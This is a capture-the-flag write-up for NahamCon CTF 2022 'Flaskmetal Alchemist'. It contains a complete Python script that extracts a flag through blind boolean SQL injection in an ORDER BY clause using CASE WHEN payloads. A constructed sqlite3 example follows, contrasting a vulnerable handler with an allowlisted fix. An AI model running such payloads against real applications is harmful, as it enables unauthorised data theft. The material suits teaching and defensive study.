NahamCon CTF 2022: Flaskmetal Alchemist
TL;DR
- User input is embedded directly into an ORDER BY clause.
- Boolean logic in CASE WHEN allows blind SQL injection.
- Response ordering leaks truth values.
- Flag extracted one character at a time via conditional sorting.
Description
Edward has decided to get into web development, and he built this awesome application that lets you search for any metal you want. Alphonse has some reservations though, so he wants you to check it out and make sure it's legit.
Solution
import requests
import string
from bs4 import BeautifulSoup

url = 'http://challenge.nahamcon.com:30010/'
flag = 'flag{'
index = 6  # SUBSTR is 1-indexed; position 6 is the first character after 'flag{'
charset = '_' + string.ascii_lowercase + '}'

# Until we've got the whole flag
while flag[-1] != '}':
    for char in charset:
        # POST data; the "order" field is the blind boolean SQLi point.
        # When the guessed character is right the table is sorted by name,
        # otherwise by atomic_number.
        data = {
            "search": "",
            "order": f"(CASE WHEN (SELECT (SUBSTR(flag, {index}, 1)) from flag ) = '{char}' THEN name ELSE atomic_number END) DESC--",
        }
        response = requests.post(url, data=data)
        # Extract the first cell of the first row
        extracted = BeautifulSoup(response.text, features="lxml").td.contents[0]
        # If it's 116 (Livermorium) the table was sorted by atomic_number, so the condition was false
        if extracted != '116':
            flag += char
            print(flag)
            index += 1
            break
    else:
        # No character in the charset matched; stop rather than loop forever
        raise SystemExit(f"no match for position {index}, got {flag!r}")
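To show why the ORDER BY oracle works and how the handler should have been written, here is an added example that is not the challenge's code (the writeup never shows the server side): a constructed sqlite3 stand-in whose table and column names are taken from the payload above, with an assumed schema and flag value. The `search` value is bound with a `?` placeholder, so it is safe either way; only the unparameterisable `order` fragment needs an allowlist.

```python
import sqlite3

# Constructed stand-in for the challenge database (schema and flag are assumed)
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE metals (name TEXT, atomic_number INTEGER);
        INSERT INTO metals VALUES ('Lithium', 3), ('Iron', 26),
                                  ('Zinc', 30), ('Livermorium', 116);
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{example}');
    """)
    return db

def search_vulnerable(db: sqlite3.Connection, search: str, order: str) -> list:
    # Hypothetical vulnerable handler: "order" is interpolated straight into
    # ORDER BY, so a CASE WHEN expression turns row order into a boolean oracle.
    sql = f"SELECT name, atomic_number FROM metals WHERE name LIKE ? ORDER BY {order}"
    return db.execute(sql, (f"%{search}%",)).fetchall()

# Only keys of this mapping may reach the SQL text; the values are fixed literals
ALLOWED_ORDER = {"name": "name", "atomic_number": "atomic_number"}

def search_hardened(db: sqlite3.Connection, search: str, order: str) -> list:
    # The user value selects an allowlisted column; any other value is rejected
    # before a query is built, so no attacker-controlled characters enter the SQL.
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError(f"unsupported sort column: {order!r}")
    sql = f"SELECT name, atomic_number FROM metals WHERE name LIKE ? ORDER BY {column} DESC"
    return db.execute(sql, (f"%{search}%",)).fetchall()

def oracle_payload(index: int, char: str) -> str:
    # Same shape as the writeup's payload: sort by name if the guess is right,
    # by atomic_number otherwise.
    return (f"(CASE WHEN (SELECT SUBSTR(flag, {index}, 1) FROM flag) = '{char}' "
            "THEN name ELSE atomic_number END) DESC--")

if __name__ == "__main__":
    db = make_db()
    # Correct guess ('e' at position 6): first row is Zinc; wrong guess: Livermorium (116)
    print(search_vulnerable(db, "", oracle_payload(6, "e"))[0])
    print(search_vulnerable(db, "", oracle_payload(6, "x"))[0])
    print(search_hardened(db, "", "atomic_number")[0])
```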
